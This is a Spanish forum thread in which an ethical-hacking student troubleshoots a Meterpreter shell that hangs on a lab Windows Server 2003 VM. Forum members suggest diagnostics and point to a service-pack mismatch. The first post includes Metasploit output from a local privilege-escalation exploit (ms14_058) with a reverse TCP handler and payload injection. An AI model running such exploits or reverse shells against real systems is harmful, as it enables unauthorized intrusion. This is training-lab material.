elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Guía actualizada para evitar que un ransomware ataque tu empresa


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking (Moderador: toxeek)
| | |-+  Error cmd.exe meterpreter y WS2003
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Error cmd.exe meterpreter y WS2003  (Leído 3,095 veces)
maziuone

Desconectado Desconectado

Mensajes: 4


Ver Perfil
Error cmd.exe meterpreter y WS2003
« en: 27 Abril 2020, 16:13 pm »

Buenas, a ver si me podéis echar una mano por que me estoy volviendo loco ya jeje.

Estoy haciendo un curso de hacking ético, y estoy atacando desde kali a una maquina de windows server 2003 que facilitan los del curso.

Y el caso es que consigo una sesión con meterpreter hacia esa maquina y cuando escribo shell para que me abra la linea de comandos se queda ahí atascado. Si voy a la mv ws2003 veo que sale en el escritorio un error de cmd.exe.

El usuario con el que lo intento abrir es NT AUTHORITY\SYSTEM por lo que debería poder abrir cmd.

En cambio si escribo shell con usuario NT AUTHORITY servicio de red abre cmd sin problemas.
Adjunto comandos.

Active sessions
===============

  Id  Name  Type                     Information                                     Connection
  --  ----  ----                     -----------                                     ----------
  9         meterpreter x86/windows  NT AUTHORITY\Servicio de red @ MEGATRON-IN9JJC  192.168.174.128:4444 -> 192.168.174.137:1198 (192.168.174.137)
  10        meterpreter x86/windows  NT AUTHORITY\Servicio de red @ MEGATRON-IN9JJC  192.168.174.128:4444 -> 192.168.174.137:1201 (192.168.174.137)

msf5 exploit(windows/local/ms14_058_track_popup_menu) > set session 10
session => 10
msf5 exploit(windows/local/ms14_058_track_popup_menu) > run

  • Started reverse TCP handler on 192.168.174.128:4444
  • Launching notepad to host the exploit...
  • Process 6096 launched.
  • Reflectively injecting the exploit DLL into 6096...
  • Injecting exploit into 6096...
  • Exploit injected. Injecting payload into 6096...
  • Payload injected. Executing exploit...
  • Sending stage (180291 bytes) to 192.168.174.137
  • Exploit finished, wait for (hopefully privileged) payload execution to complete.
  • Meterpreter session 11 opened (192.168.174.128:4444 -> 192.168.174.137:1206) at 2020-04-27 15:33:41 +0200

meterpreter > shell
Process 3348 created.
Channel 1 created.
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > shell
Process 3404 created.
Channel 2 created.
meterpreter >


He buscado por internet y no veo nada relacionado. He cargado de nuevo la mv ws2003 por si era algo de sistema aunque no tiene sentido por que con el user nt auhority servicios de red si lo abre, pero nada.

Alguna idea? Hago algo mal?
En línea

EdePC
Moderador Global
***
Desconectado Desconectado

Mensajes: 2.057



Ver Perfil
Re: Error cmd.exe meterpreter y WS2003
« Respuesta #1 en: 27 Abril 2020, 16:24 pm »

Que dice el error de cmd.exe?, has revisado el visor de eventos del w2003?, quizá no puede cargar o no tiene permiso de cargar alguna dependencia de cmd.exe como System, esto debería de reflejarse en el Visor de Eventos o podrías utilizar Process Monitor para ver que sucede.
En línea

maziuone

Desconectado Desconectado

Mensajes: 4


Ver Perfil
Re: Error cmd.exe meterpreter y WS2003
« Respuesta #2 en: 27 Abril 2020, 16:39 pm »

Que dice el error de cmd.exe?, has revisado el visor de eventos del w2003?, quizá no puede cargar o no tiene permiso de cargar alguna dependencia de cmd.exe como System, esto debería de reflejarse en el Visor de Eventos o podrías utilizar Process Monitor para ver que sucede.

El error que da es cmd.exe (0xc0000142)

En el visor de eventos el error que da es este: (error id 1030)

Windows no puede hacer una consulta de la lista de objetos directiva de grupo. Compruebe el registro de eventos ante la posible existencia de mensajes previamente registrados por el motor de directiva que describe el motivo del suceso.

Para obtener más información, vea el Centro de ayuda y soporte técnico en http://go.microsoft.com/fwlink/events.asp.
En línea

maziuone

Desconectado Desconectado

Mensajes: 4


Ver Perfil
Re: Error cmd.exe meterpreter y WS2003
« Respuesta #3 en: 28 Abril 2020, 16:20 pm »

Nadie me puede ayudar?
En línea

EdePC
Moderador Global
***
Desconectado Desconectado

Mensajes: 2.057



Ver Perfil
Re: Error cmd.exe meterpreter y WS2003
« Respuesta #4 en: 28 Abril 2020, 17:38 pm »

El error que te da es bastante genérico y tiene pocos detalles, tengo entendido de que es un problema de acceso a dependencias, puede ser por permisos de archivo o políticas de restricción.

Lo que se me ocurre es que utilices ProcMon (Process Monitor) y te ponga a monitorizar el Registro y los Archivos, luego llames a ejecutar cmd.exe cuando funciona, despues cuando no funciona y comparar Logs.
En línea

maziuone

Desconectado Desconectado

Mensajes: 4


Ver Perfil
Re: Error cmd.exe meterpreter y WS2003
« Respuesta #5 en: 29 Abril 2020, 16:58 pm »

El error que te da es bastante genérico y tiene pocos detalles, tengo entendido de que es un problema de acceso a dependencias, puede ser por permisos de archivo o políticas de restricción.

Lo que se me ocurre es que utilices ProcMon (Process Monitor) y te ponga a monitorizar el Registro y los Archivos, luego llames a ejecutar cmd.exe cuando funciona, despues cuando no funciona y comparar Logs.

Pues he monitorizado con procmon y al ejecutar cmd desde meterpreter me dice success en procmon. La verdad es que ya no sé que hacer.
« Última modificación: 29 Abril 2020, 17:13 pm por maziuone » En línea

Arcano.


Desconectado Desconectado

Mensajes: 469



Ver Perfil
Re: Error cmd.exe meterpreter y WS2003
« Respuesta #6 en: 3 Mayo 2020, 17:35 pm »

Buenas,

En la descripción de ese exploit te indica:

"Description:
  This module exploits a NULL Pointer Dereference in win32k.sys, the
  vulnerability can be triggered through the use of TrackPopupMenu.
  Under special conditions, the NULL pointer dereference can be abused
  on xxxSendMessageTimeout to achieve arbitrary code execution. This
  module has been tested successfully on Windows XP SP3, Windows 2003
  SP2
, Windows 7 SP1 and Windows 2008 32bits. Also on Windows 7 SP1
  and Windows 2008 R2 SP1 64 bits."


El server que estás utilizando, creo, tiene SP1. Por otro lado, en ocasiones la descripción es orientativa, tu exploit es de método post-explotación; cuando ya has conseguido el acceso. ¿Con qué exploit/payload previo has conseguido la sesión? Revisa el target. Si no lo has cambiado, te lo lanza como auto (inglés). Y el server es spanish -59  Windows 2003 SP1 Spanish (NO NX)-

Y, por último, si con el exploit/payload previo ya eres SYSTEM, ¿para qué vuelves a lanzar el segundo exploit?. Sólo te serviría para elevar privilegios, pero... Ya eres SYSTEM =)

Saludos!
En línea

La curiosidad es la antesala al conocimiento...
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Meterpreter
Seguridad
n3n3 2 3,171 Último mensaje 27 Febrero 2015, 07:38 am
por .:UND3R:.
metasploit - Error con comando run gettelnet en meterpreter
Hacking
Spikes 3 6,040 Último mensaje 8 Agosto 2017, 21:04 pm
por Spikes
android/meterpreter/reverse_tcp error por favor ayuda
GNU/Linux
log015 0 2,296 Último mensaje 24 Agosto 2017, 02:08 am
por log015
error en payload android/meterpreter/reverse_tcp
Bugs y Exploits
log015 1 5,242 Último mensaje 11 Enero 2018, 01:38 am
por ronluas
Error ejecutando comando en meterpreter
Dudas Generales
THE_GEORGE 1006 0 2,411 Último mensaje 26 Noviembre 2019, 23:44 pm
por THE_GEORGE 1006
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines